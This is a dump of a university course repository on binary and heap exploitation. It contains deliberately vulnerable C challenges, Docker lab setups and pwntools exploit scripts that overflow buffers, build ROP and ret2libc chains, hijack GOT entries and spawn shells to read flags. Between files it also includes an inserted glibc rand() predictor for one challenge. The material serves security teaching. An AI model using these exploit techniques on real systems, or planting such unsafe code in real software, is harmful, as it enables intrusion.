.
├── LICENSE
├── Makefile
├── README.md
├── week1
│   ├── Makefile
│   ├── bof
│   │   ├── Dockerfile
│   │   ├── share
│   │   │   ├── bof
│   │   │   ├── flag
│   │   │   └── run.sh
│   │   └── xinetd
│   ├── casino
│   │   ├── Dockerfile
│   │   ├── share
│   │   │   ├── casino
│   │   │   ├── flag
│   │   │   └── run.sh
│   │   └── xinetd
│   ├── docker-compose.yml
│   ├── exp
│   │   ├── bof.py
│   │   ├── casino.py
│   │   └── orw.py
│   ├── orw
│   │   ├── Dockerfile
│   │   ├── share
│   │   │   ├── flag
│   │   │   ├── orw
│   │   │   └── run.sh
│   │   └── xinetd
│   └── src
│       ├── bof.c
│       ├── casino.c
│       ├── demo.c
│       └── orw.c
├── week2
│   ├── Makefile
│   ├── casino++
│   │   ├── Dockerfile
│   │   ├── share
│   │   │   ├── casino++
│   │   │   ├── flag
│   │   │   └── run.sh
│   │   └── xinetd
│   ├── docker-compose.yml
│   ├── exp
│   │   ├── casino++.py
│   │   ├── libc-2.27.so
│   │   ├── ret2libc.py
│   │   ├── ret2plt.py
│   │   └── rop.py
│   ├── ret2libc
│   │   ├── Dockerfile
│   │   ├── share
│   │   │   ├── flag
│   │   │   ├── ret2libc
│   │   │   └── run.sh
│   │   └── xinetd
│   ├── ret2plt
│   │   ├── Dockerfile
│   │   ├── share
│   │   │   ├── flag
│   │   │   ├── ret2plt
│   │   │   └── run.sh
│   │   └── xinetd
│   ├── rop
│   │   ├── Dockerfile
│   │   ├── share
│   │   │   ├── flag
│   │   │   ├── rop
│   │   │   └── run.sh
│   │   └── xinetd
│   └── src
│       ├── casino++.c
│       ├── ret2libc.c
│       ├── ret2plt.c
│       └── rop.c
└── week3
    ├── Makefile
    ├── docker-compose.yml
    ├── election
    │   ├── Dockerfile
    │   ├── share
    │   │   ├── election
    │   │   ├── flag
    │   │   └── run.sh
    │   └── xinetd
    ├── exp
    │   ├── election.py
    │   ├── libc-2.23.so
    │   ├── libc-2.27.so
    │   ├── note++.py
    │   ├── note.py
    │   ├── t-note.py
    │   └── uaf.py
    ├── note++
    │   ├── Dockerfile
    │   ├── share
    │   │   ├── flag
    │   │   ├── note++
    │   │   └── run.sh
    │   └── xinetd
    ├── note
    │   ├── Dockerfile
    │   ├── share
    │   │   ├── flag
    │   │   ├── note
    │   │   └── run.sh
    │   └── xinetd
    ├── src
    │   ├── election.c
    │   ├── note++.c
    │   ├── note.c
    │   ├── t-note.c
    │   └── uaf.c
    ├── t-note
    │   ├── Dockerfile
    │   ├── share
    │   │   ├── flag
    │   │   ├── run.sh
    │   │   └── t-note
    │   └── xinetd
    └── uaf
        ├── Dockerfile
        ├── share
        │   ├── flag
        │   ├── run.sh
        │   └── uaf
        └── xinetd

/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2019 yuawn

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
all:
	make -C week1
	make -C week2
	make -C week3

clean:
	make -C week1 clean
	make -C week2 clean
	make -C week3 clean
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# NTU Computer Security Fall 2019 (台大 計算機安全)
I served as head TA for the course and as lecturer for the three-week Pwn module.

## Course content
### Week 1: Binary Exploitation - Basic

- Slide: [speakerdeck.com/yuawn/binary-exploitation-basic](https://speakerdeck.com/yuawn/binary-exploitation-basic)
- Video: [youtu.be/U8N6aE-Nq-Q](https://youtu.be/U8N6aE-Nq-Q)
- Lab:
  - [bof](week1/exp/bof.py)
    - stack buffer overflow, overwrite the return address
  - [orw](week1/exp/orw.py)
    - seccomp syscall filter, shellcode
- Homework:
  - [Casino](week1/exp/casino.py)
    - out-of-bounds array access, GOT hijacking, shellcode

### Week 2: Binary Exploitation

- Slide: [speakerdeck.com/yuawn/binary-exploitation](https://speakerdeck.com/yuawn/binary-exploitation)
- Video: [youtu.be/5D7tvxpSUUM](https://youtu.be/5D7tvxpSUUM)
- Lab:
  - [ROP](week2/exp/rop.py)
    - ROP to bypass NX protection
  - [ret2plt](week2/exp/ret2plt.py)
    - practice calling functions through the PLT
  - [ret2libc](week2/exp/ret2libc.py)
    - information leak, bypass ASLR, practice the ret2libc technique
- Homework:
  - [Casino++](week2/exp/casino++.py)
    - out-of-bounds array access, GOT hijacking, leak libc, ret2libc: hijack a PLT function to system()

### Week 3: Heap Exploitation

- Slide: [speakerdeck.com/yuawn/heap-exploitation](https://speakerdeck.com/yuawn/heap-exploitation)
- Video: [youtu.be/rMqvL9j0QaM](https://youtu.be/rMqvL9j0QaM)
- Lab:
  - [UAF](week3/exp/uaf.py)
    - practice using a use-after-free to leak addresses and exploit
  - [Note](week3/exp/note.py)
    - double free, fastbin attack
  - [T-Note](week3/exp/t-note.py)
    - tcache dup
- Homework:
  - [Election](week3/exp/election.py)
    - stack pivoting, ret2csu (the __libc_csu_init gadget)
  - [Note++](week3/exp/note++.py)
    - off-by-one null byte overflow, fastbin dup, forge a chunk size to leak libc, overwrite __malloc_hook, one gadget

## Challenges
- In each week's directory, `src` holds the challenge source code
- In each week's directory, `exp` holds the solution exploits

### Environment
- OS: ubuntu 18.04
- GCC: gcc (Ubuntu 7.4.0-1ubuntu1~18.04.1) 7.4.0

### Build

```bash
cd week1 # week2 week3
docker-compose up -d
```

### Compile (if you need to rebuild the challenge binaries yourself)

```bash
sudo apt install libseccomp-dev
make
```
--------------------------------------------------------------------------------
/week1/Makefile:
--------------------------------------------------------------------------------
all: src/bof.c src/orw.c src/casino.c
	gcc src/bof.c -o ./bof/share/bof -no-pie -fno-stack-protector
	gcc src/orw.c -o ./orw/share/orw -no-pie -fno-stack-protector -z execstack -lseccomp
	gcc src/casino.c -o ./casino/share/casino -no-pie -z execstack

clean:
	rm bof/share/bof orw/share/orw casino/share/casino
--------------------------------------------------------------------------------
/week1/bof/Dockerfile:
--------------------------------------------------------------------------------
FROM ubuntu:18.04
MAINTAINER yuawn
RUN apt-get update
RUN apt-get install xinetd -y
RUN useradd -m bof
RUN chmod 774 /tmp
RUN chmod -R 774 /var/tmp
RUN chmod -R 774 /dev
RUN chmod -R 774 /run
RUN chmod 1733 /tmp /var/tmp /dev/shm
RUN chown -R root:root /home/bof
CMD ["/usr/sbin/xinetd","-dontfork"]
--------------------------------------------------------------------------------
/week1/bof/share/bof:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week1/bof/share/bof
--------------------------------------------------------------------------------
/week1/bof/share/flag:
--------------------------------------------------------------------------------
FLAG{Pwned_7he_f1rs7_b1n4ry}
--------------------------------------------------------------------------------
/week1/bof/share/run.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
exec 2>/dev/null
timeout 60 /home/bof/bof
--------------------------------------------------------------------------------
/week1/bof/xinetd:
--------------------------------------------------------------------------------
service bof
{
    disable = no
    type = UNLISTED
    wait = no
    server = /home/bof/run.sh
    socket_type = stream
    protocol = tcp
    user = bof
    port = 4597
    flags = REUSE
    per_source = 5
    rlimit_cpu = 3
    nice = 18
}
--------------------------------------------------------------------------------
/week1/casino/Dockerfile:
--------------------------------------------------------------------------------
FROM ubuntu:18.04
MAINTAINER yuawn
RUN apt-get update
RUN apt-get install xinetd -y
RUN useradd -m casino
RUN chmod 774 /tmp
RUN chmod -R 774 /var/tmp
RUN chmod -R 774 /dev
RUN chmod -R 774 /run
RUN chmod 1733 /tmp /var/tmp /dev/shm
RUN chown -R root:root /home/casino
CMD ["/usr/sbin/xinetd","-dontfork"]
--------------------------------------------------------------------------------
/week1/casino/share/casino:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week1/casino/share/casino
--------------------------------------------------------------------------------
/week1/casino/share/flag:
--------------------------------------------------------------------------------
FLAG{0verf1ow_1n_ev3rywhere!}
--------------------------------------------------------------------------------
/week1/casino/share/run.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
exec 2>/dev/null
timeout 60 /home/casino/casino
--------------------------------------------------------------------------------
/week1/casino/xinetd:
--------------------------------------------------------------------------------
service casino
{
    disable = no
    type = UNLISTED
    wait = no
    server = /home/casino/run.sh
    socket_type = stream
    protocol = tcp
    user = casino
    port = 4597
    flags = REUSE
    per_source = 5
    rlimit_cpu = 3
    nice = 18
}
--------------------------------------------------------------------------------
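The Casino homework seeds `rand()` with `time(0)`, but `read(0, name, 0x100)` in week1/src/casino.c runs past the 0x10-byte `name` into the globals declared after it, and the six lottery numbers hardcoded in week1/exp/casino.py (83, 86, 77, 15, 93, 35, and the longer list in its comment) are exactly glibc's `rand() % 100` stream for seed 0, which glibc's `srandom` treats as seed 1. The block below is an added example, not code from the course repository: a pure-Python reimplementation of glibc's default TYPE_3 additive-feedback generator, so the lottery can be predicted for seed 0 or for a guessed `time(0)` without linking against libc. It assumes the target uses glibc (musl, BSD and Windows CRTs use different generators).

```python
#!/usr/bin/env python3
"""Predict glibc rand() output for a known seed (added example, not from the course repo)."""

MASK32 = 0xFFFFFFFF
MERSENNE31 = 2147483647     # 2**31 - 1, modulus of the Park-Miller LCG glibc seeds with


def glibc_rand_sequence(seed, count):
    """Return the first `count` values glibc's rand() yields after srand(seed).

    Mirrors glibc's default TYPE_3 generator (degree 31, separation 3):
    r[0..30] is filled by a Park-Miller LCG, r[31..33] copies r[0..2], then
    r[i] = r[i-31] + r[i-3] (mod 2^32).  The first 310 of those sums are the
    warm-up glibc discards; every later one is returned as r[i] >> 1.
    glibc maps seed 0 to 1, so srand(0) and srand(1) produce the same stream.
    """
    word = seed & MASK32
    if word == 0:
        word = 1
    if word > 0x7FFFFFFF:           # glibc stores the seed in an int32_t
        word -= 1 << 32
    r = [word]
    for _ in range(1, 31):          # Python ints are unbounded, so no Schrage trick needed
        r.append((16807 * r[-1]) % MERSENNE31)
    for i in range(31, 34):
        r.append(r[i - 31])
    out = []
    for i in range(34, 344 + count):
        r.append((r[i - 31] + r[i - 3]) & MASK32)
        if i >= 344:                # indices 34..343 are the discarded warm-up
            out.append(r[i] >> 1)
    return out


def predict_lottery(seed, n=6):
    """The numbers casino.c draws: lottery[i] = rand() % 100 for i in 0..n-1."""
    return [v % 100 for v in glibc_rand_sequence(seed, n)]


if __name__ == "__main__":
    import time
    print("seed 0 (what the overflow in casino.py forces):", predict_lottery(0))
    print("seed time(0) right now:", predict_lottery(int(time.time())))
```

Both `try` rounds in `casino()` reuse the same `lottery`, so one prediction covers both guesses. With the untouched `time(0)` seed you need the container's clock to within a second; zeroing the seed through the overflow removes that dependency, which is why the exploit prefers it.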
/week1/docker-compose.yml:
--------------------------------------------------------------------------------
version: '2'
services:
  bof:
    build: ./bof/
    volumes:
      - ./bof/share:/home/bof:ro
      - ./bof/xinetd:/etc/xinetd.d/bof:ro
      - ./tmp:/tmp:ro
    ports:
      - "10170:4597"
  orw:
    build: ./orw/
    volumes:
      - ./orw/share:/home/orw:ro
      - ./orw/xinetd:/etc/xinetd.d/orw:ro
      - ./tmp:/tmp:ro
    ports:
      - "10171:4597"
  casino:
    build: ./casino/
    volumes:
      - ./casino/share:/home/casino:ro
      - ./casino/xinetd:/etc/xinetd.d/casino:ro
      - ./tmp:/tmp:ro
    ports:
      - "10172:4597"
--------------------------------------------------------------------------------
/week1/exp/bof.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
from pwn import *

#y = process( '../bof/share/bof' )
y = remote( 'localhost' , 10170 )
#y = remote( 'edu-ctf.csie.org' , 10170 )

# 0x30-byte buf + 8-byte saved rbp, then the saved return address
p = 'a' * 0x38 + p64( 0x40068b )
y.sendlineafter( '.' , p )

y.sendline( 'cat /home/`whoami`/flag' )

y.interactive()
--------------------------------------------------------------------------------
/week1/exp/casino.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
from pwn import *

context.arch = 'amd64'
y = remote( 'localhost' , 10172 )
#y = remote( 'edu-ctf.csie.org' , 10172 )
#y = process( '../casino/share/casino' )

# glibc rand() % 100 stream for srand(0); the zero bytes sent as the name overflow the seed
rnd = [83,86,77,15,93,35]

name = 0x6020f0
y.sendafter( ':' , '\0' * 0x20 + asm( shellcraft.sh() ) )
y.sendafter( ':' , '27' )

for i in range( 6 ):
    y.sendafter( ':' , '7\n' )
y.sendafter( ']: ' , '1\n' )
y.sendafter( ': ' , '-42\n' )
y.sendafter( ': ' , '0\n' )

for i in rnd:
    y.sendafter( ':' , str(i) + '\n' )

y.sendafter( ']: ' , '1\n' )
y.sendafter( ': ' , '-43' )
y.sendafter( ': ' , str( name + 0x20 ) )


y.interactive()


'''
0: 83
1: 86
2: 77
3: 15
4: 93
5: 35

6: 86
7: 92
8: 49
9: 21
10: 62
11: 27

12: 90
13: 59
14: 63
15: 26
16: 40
17: 26
18: 72
19: 36
'''
--------------------------------------------------------------------------------
/week1/exp/orw.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
from pwn import *

context.arch = 'amd64'

y = remote( 'localhost' , 10171 )
#y = remote( 'edu-ctf.csie.org' , 10171 )
#y = process( '../orw/share/orw' )
#pause()

# handcraft assembly
sc = asm('''
    mov rax, 0x67616c662f77
    push rax
    mov rax, 0x726f2f656d6f682f
    push rax
    mov rdi, rsp
    xor rsi, rsi
    xor rdx, rdx
    mov rax, 2
    syscall
    // open( "/home/orw/flag" , 0 , 0 )

    mov rdi, rax
    mov rsi, rsp
    mov rdx, 0x50
    mov rax, 0
    syscall
    // read( fd , rsp , 0x50 )

    mov rdi, 1
    mov rax, 1
    syscall
    // write( 1 , rsp , 0x50 )

''')

# pwnlib shellcraft
'''
sc = asm(
    shellcraft.pushstr( "/home/orw/flag" ) +
    shellcraft.open( 'rsp' , 0 , 0 ) +
    shellcraft.read( 'rax' , 'rsp' , 0x30 ) +
    shellcraft.write( 1 , 'rsp' , 0x30 )
)
'''

y.sendafter( '>' , sc )

y.sendlineafter( ':)' , 'a' * 0x18 + p64( 0x6010a0 ) )

y.interactive()
--------------------------------------------------------------------------------
/week1/orw/Dockerfile:
--------------------------------------------------------------------------------
FROM ubuntu:18.04
MAINTAINER yuawn
RUN apt-get update
RUN apt-get install xinetd -y
RUN useradd -m orw
RUN chmod 774 /tmp
RUN chmod -R 774 /var/tmp
RUN chmod -R 774 /dev
RUN chmod -R 774 /run
RUN chmod 1733 /tmp /var/tmp /dev/shm
RUN chown -R root:root /home/orw
CMD ["/usr/sbin/xinetd","-dontfork"]
--------------------------------------------------------------------------------
/week1/orw/share/flag:
--------------------------------------------------------------------------------
FLAG{H0w_2_she1lc0d1ng}
--------------------------------------------------------------------------------
/week1/orw/share/orw:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week1/orw/share/orw
--------------------------------------------------------------------------------
/week1/orw/share/run.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
exec 2>/dev/null
timeout 60 /home/orw/orw
--------------------------------------------------------------------------------
/week1/orw/xinetd:
--------------------------------------------------------------------------------
service orw
{
    disable = no
    type = UNLISTED
    wait = no
    server = /home/orw/run.sh
    socket_type = stream
    protocol = tcp
    user = orw
    port = 4597
    flags = REUSE
    per_source = 5
    rlimit_cpu = 3
    nice = 18
}
--------------------------------------------------------------------------------
/week1/src/bof.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>


void try_to_call_me(){
    system("sh");
}

int main(){

    setvbuf(stdout,0,2,0);
    setvbuf(stdin,0,2,0);
    setvbuf(stderr,0,2,0);

    puts( "Welcome to EDU CTF 2019." );

    char buf[0x30];
    gets( buf );    // unbounded read: overflows buf, the saved rbp and the return address

    return 0;
}
--------------------------------------------------------------------------------
/week1/src/casino.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <time.h>


int lottery[6] = {0}, guess[6] = {0};
char name[0x10] = {0};
int age, seed;

void init(){
    setvbuf(stdout,0,2,0);
    setvbuf(stdin,0,2,0);
    setvbuf(stderr,0,2,0);
    seed = time(0);
}

int read_int(){
    char buf[0x10];
    __read_chk( 0 , buf , 0xf , 0x10 );
    return atoi( buf );
}

void welcome(){
    puts( "+--------------------+" );
    puts( "|       Casino       |" );
    puts( "+--------------------+" );
    puts( "" );
}


void casino(){

    srand( seed );
    for( int i = 0 ; i < 6 ; ++i ) lottery[i] = rand() % 100;

    int try = 2, idx;

    while( try-- ){
        printf( "\n$$$$$$$ Lottery $$$$$$$\n " );

        for( int i = 0 ; i < 6 ; ++i ){
            printf( "Chose the number %d: " , i );
            guess[i] = read_int();
        }

        printf( "Change the number? [1:yes 0:no]: " );
        if( read_int() == 1 ){
            printf( "Which number [1 ~ 6]: " );
            idx = read_int() - 1;               // never bounds-checked: a negative idx writes below guess[]
            printf( "Chose the number %d: " , idx );
            guess[idx] = read_int();
        }

        for( int i = 0 ; i < 6 ; ++i ){
            if( guess[i] != lottery[i] ) break;
            if( i == 5 ){
                puts( "You win! Hacker don't need luck :P" );
            }
        }
    }

    printf( "You lose.\nBye~\n " );
}


int main(){

    init();
    welcome();

    puts( "Show me your passport." );
    printf( "Your name: " );
    read( 0 , name , 0x100 ); // Oops

    printf( "Your age: " );
    age = read_int();

    if( age < 20 ){
        puts( "You can not enter the casino!" );
    }
    else{
        casino();
    }

    return 0;
}
--------------------------------------------------------------------------------
/week1/src/demo.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <unistd.h>

int main(){

    char buf[0x100];
    read( 0 , buf , 0x100 );

    puts( "Hello World!" );

    return 0;
}
--------------------------------------------------------------------------------
/week1/src/orw.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <seccomp.h>


void init(){
    setvbuf(stdout,0,2,0);
    setvbuf(stdin,0,2,0);
    setvbuf(stderr,0,2,0);
}

void seccomp(){
    scmp_filter_ctx ctx;
    ctx = seccomp_init(SCMP_ACT_KILL);      // default action: kill; only the syscalls below are allowed
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0);
    seccomp_load(ctx);
}

char sc[0x100];

int main(){

    init();
    seccomp();

    puts( "Give me your shellcode>" );
    read( 0 , sc , 0x100 );

    puts( "I give you bof, you know what to do :)" );
    char buf[0x10];
    gets( buf );

    return 0;
}
--------------------------------------------------------------------------------
/week2/Makefile:
--------------------------------------------------------------------------------
all: src/rop.c src/ret2plt.c src/ret2libc.c src/casino++.c
	gcc src/rop.c -o ./rop/share/rop -no-pie -fno-stack-protector --static
	gcc src/ret2plt.c -o ./ret2plt/share/ret2plt -no-pie -fno-stack-protector
	gcc src/ret2libc.c -o ./ret2libc/share/ret2libc -no-pie -fno-stack-protector
	gcc src/casino++.c -o ./casino++/share/casino++ -no-pie

clean:
	rm rop/share/rop ret2plt/share/ret2plt ret2libc/share/ret2libc casino++/share/casino++
--------------------------------------------------------------------------------
/week2/casino++/Dockerfile:
--------------------------------------------------------------------------------
FROM ubuntu:18.04
MAINTAINER yuawn
RUN apt-get update
RUN apt-get install xinetd -y
RUN useradd -m casino++
RUN chmod 774 /tmp
RUN chmod -R 774 /var/tmp
RUN chmod -R 774 /dev
RUN chmod -R 774 /run
RUN chmod 1733 /tmp /var/tmp /dev/shm
RUN chown -R root:root /home/casino++
CMD ["/usr/sbin/xinetd","-dontfork"]
--------------------------------------------------------------------------------
/week2/casino++/share/casino++:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week2/casino++/share/casino++
--------------------------------------------------------------------------------
/week2/casino++/share/flag:
--------------------------------------------------------------------------------
FLAG{Y0u_pwned_me_ag4in_Pwn1ng_n3ver_d1e}
--------------------------------------------------------------------------------
/week2/casino++/share/run.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
exec 2>/dev/null
timeout 60 /home/casino++/casino++
--------------------------------------------------------------------------------
/week2/casino++/xinetd:
--------------------------------------------------------------------------------
service casino++
{
    disable = no
    type = UNLISTED
    wait = no
    server = /home/casino++/run.sh
    socket_type = stream
    protocol = tcp
    user = casino++
    port = 4597
    flags = REUSE
    per_source = 5
    rlimit_cpu = 3
    nice = 18
}
--------------------------------------------------------------------------------
/week2/docker-compose.yml:
--------------------------------------------------------------------------------
version: '2'
services:
  rop:
    build: ./rop/
    volumes:
      - ./rop/share:/home/rop:ro
      - ./rop/xinetd:/etc/xinetd.d/rop:ro
      - ./tmp:/tmp:ro
    ports:
      - "10173:4597"
  ret2plt:
    build: ./ret2plt/
    volumes:
      - ./ret2plt/share:/home/ret2plt:ro
      - ./ret2plt/xinetd:/etc/xinetd.d/ret2plt:ro
      - ./tmp:/tmp:ro
    ports:
      - "10174:4597"
  ret2libc:
    build: ./ret2libc/
    volumes:
      - ./ret2libc/share:/home/ret2libc:ro
      - ./ret2libc/xinetd:/etc/xinetd.d/ret2libc:ro
      - ./tmp:/tmp:ro
    ports:
      - "10175:4597"
  casino_pro:
    build: ./casino++/
    volumes:
      - ./casino++/share:/home/casino++:ro
      - ./casino++/xinetd:/etc/xinetd.d/casino++:ro
      - ./tmp:/tmp:ro
    ports:
      - "10176:4597"
--------------------------------------------------------------------------------
/week2/exp/casino++.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
from pwn import *

l = ELF( 'libc-2.27.so' )

context.arch = 'amd64'
#y = remote( 'edu-ctf.csie.org' , 10176 )
y = remote( 'localhost' , 10176 )
#y = process( '../casino++/share/casino++' )

def casino( ans , idx , num ):
    # one lottery round: six guesses, then the unchecked "Change the number" write guess[idx] = num
    for i in ans:
        y.sendlineafter( ':' , str( i ) )
    y.sendlineafter( ']: ' , '1' )
    y.sendlineafter( ': ' , str( idx ) )
    y.sendlineafter( ': ' , str( num ) )


lose = [0] * 6
win = [61,68,32,22,69,20]

name = 0x6020f0

y.sendafter( ':' , '\0' * 0x10 + p64( 0x601ff0 ) + p64( 0 ) + asm( shellcraft.sh() ) )
y.sendafter( ':' , '27' )

casino( lose , -42 , 0 )
casino( win , -43 , 0x40095d ) # casino()

casino( lose , -34 , 0 )
casino( win , -35 , 0x4006e6 )

l.address = u64( y.recv(6) + '\0\0' ) - l.sym.__libc_start_main
success( 'libc -> %s' % hex( l.address ) )

win = [22,67,58,53,74,3]
one = l.address + 0x10a38c

casino( lose , -42 , 0 )
casino( win , -43 , 0x40095d ) # casino()

# only the low dword is rewritten: the resolved GOT entry already holds libc's upper 32 bits
casino( lose , -29 , l.sym.system & 0xffffffff ) # system()

y.sendafter( ': ' , 'sh\n' )

sleep( 0.3 )
y.sendline( 'cat /home/`whoami`/flag' )

y.interactive()
--------------------------------------------------------------------------------
/week2/exp/libc-2.27.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week2/exp/libc-2.27.so
--------------------------------------------------------------------------------
/week2/exp/ret2libc.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
from pwn import *

context.arch = 'amd64'

l = ELF( './libc-2.27.so' )

y = remote( 'localhost' , 10175 )
#y = remote( 'edu-ctf.csie.org' , 10175 )
#y = process( '../ret2libc/share/ret2libc' )
#pause()

bss = 0x6b6000
pop_rdi = 0x0000000000400733
pop_rsi_r15 = 0x0000000000400731
ret = 0x400506

gets_plt = 0x400530
puts_plt = 0x400520

libc_start_main_got = 0x600ff0
main = 0x400698

# stage 1: puts( GOT[__libc_start_main] ) leaks a libc pointer, then return to main for a second overflow
p = flat(
    'a' * 0x38,
    pop_rdi,
    libc_start_main_got,
    puts_plt,
    main
)

y.sendlineafter( ':D' , p )

y.recvline()

libc = u64( y.recv(6) + '\0\0' ) - 0x21ab0
success( 'libc -> %s' % hex( libc ) )

system_off = 0x4f440
system_func_ptr = libc + system_off
bin_sh = libc + 0x1b3e9a

#print '"/bin/sh" str :' , hex( l.search( '/bin/sh' ).next() )

# For demo
'''
p = flat(
    'a' * 0x38,
    ret,
    pop_rdi,
    l.search( '/bin/sh' ).next(),
    l.sym.system
)
'''

# stage 2: the extra ret keeps rsp 16-byte aligned when system() is entered
p = flat(
    'a' * 0x38,
    ret,
    pop_rdi,
    bin_sh,
    system_func_ptr
)
y.sendlineafter( ':D' , p )

y.sendline( 'cat /home/`whoami`/flag' )

y.interactive()
--------------------------------------------------------------------------------
/week2/exp/ret2plt.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
from pwn import *

context.arch = 'amd64'

y = remote( 'localhost' , 10174 )
#y = remote( 'edu-ctf.csie.org' , 10174 )
#y = process( '../ret2plt/share/ret2plt' )
#pause()

pop_rdi = 0x0000000000400733

gets_plt = 0x400530
system_plt = 0x400520
bss = 0x601070

# gets( bss ) reads "sh" into writable memory, then system( bss )
p = flat(
    'a' * 0x38,
    pop_rdi,
    bss,
    gets_plt,
    pop_rdi,
    bss,
    system_plt
)

y.sendlineafter( ':D' , p )

y.sendline( 'sh' )

y.sendline( 'cat /home/`whoami`/flag' )

y.interactive()
--------------------------------------------------------------------------------
/week2/exp/rop.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
from pwn import *

context.arch = 'amd64'

y = remote( 'localhost' , 10173 )
#y = remote( 'edu-ctf.csie.org' , 10173 )
#y = process( '../rop/share/rop' )
#pause()


pop_rax = 0x0000000000415714
pop_rdi = 0x0000000000400686
pop_rsi = 0x00000000004100f3
pop_rdx = 0x0000000000449935
mov_q_rdi_rsi = 0x000000000044709b # mov qword ptr [rdi], rsi ; ret
syscall = 0x000000000047b68f

pop_rdx_rsi = 0x000000000044beb9

bss = 0x6b6030

# write "/bin/sh\0" to .bss, then execve( bss , 0 , 0 ) via syscall 0x3b
p = flat(
    'a' * 0x38,
    pop_rdi,
    bss,
    pop_rsi,
    '/bin/sh\0',
    mov_q_rdi_rsi,
    pop_rsi,
    0,
    pop_rdx,
    0,
    pop_rax,
    0x3b,
    syscall
)

y.sendlineafter( ':D' , p )

y.sendline( 'cat /home/`whoami`/flag' )

y.interactive()
--------------------------------------------------------------------------------
/week2/ret2libc/Dockerfile:
--------------------------------------------------------------------------------
FROM ubuntu:18.04
MAINTAINER yuawn
RUN apt-get update
RUN apt-get install xinetd -y
RUN useradd -m ret2libc
RUN chmod 774 /tmp
RUN chmod -R 774 /var/tmp
RUN chmod -R 774 /dev
RUN chmod -R 774 /run
RUN chmod 1733 /tmp /var/tmp /dev/shm
RUN chown -R root:root /home/ret2libc
CMD ["/usr/sbin/xinetd","-dontfork"]
--------------------------------------------------------------------------------
/week2/ret2libc/share/flag:
--------------------------------------------------------------------------------
FLAG{ret21ibc_15_p0werfu1}
c
--------------------------------------------------------------------------------
/week2/ret2libc/share/ret2libc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week2/ret2libc/share/ret2libc
--------------------------------------------------------------------------------
/week2/ret2libc/share/run.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
exec 2>/dev/null
timeout 60 /home/ret2libc/ret2libc
--------------------------------------------------------------------------------
/week2/ret2libc/xinetd:
--------------------------------------------------------------------------------
service ret2libc
{
    disable = no
    type = UNLISTED
    wait = no
    server = /home/ret2libc/run.sh
    socket_type = stream
    protocol = tcp
    user = ret2libc
    port = 4597
    flags = REUSE
    per_source = 5
    rlimit_cpu = 3
    nice = 18
}
--------------------------------------------------------------------------------
/week2/ret2plt/Dockerfile:
--------------------------------------------------------------------------------
FROM ubuntu:18.04
MAINTAINER yuawn
RUN apt-get update
RUN apt-get install xinetd -y
RUN useradd -m ret2plt
RUN chmod 774 /tmp
RUN chmod -R 774 /var/tmp
RUN chmod -R 774 /dev
RUN chmod -R 774 /run
RUN chmod 1733 /tmp /var/tmp /dev/shm
RUN chown -R root:root /home/ret2plt
CMD ["/usr/sbin/xinetd","-dontfork"]
--------------------------------------------------------------------------------
/week2/ret2plt/share/flag:
--------------------------------------------------------------------------------
FLAG{ret2222222222222222222p1t}
--------------------------------------------------------------------------------
/week2/ret2plt/share/ret2plt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week2/ret2plt/share/ret2plt
--------------------------------------------------------------------------------
/week2/ret2plt/share/run.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
exec 2>/dev/null
timeout 60 /home/ret2plt/ret2plt
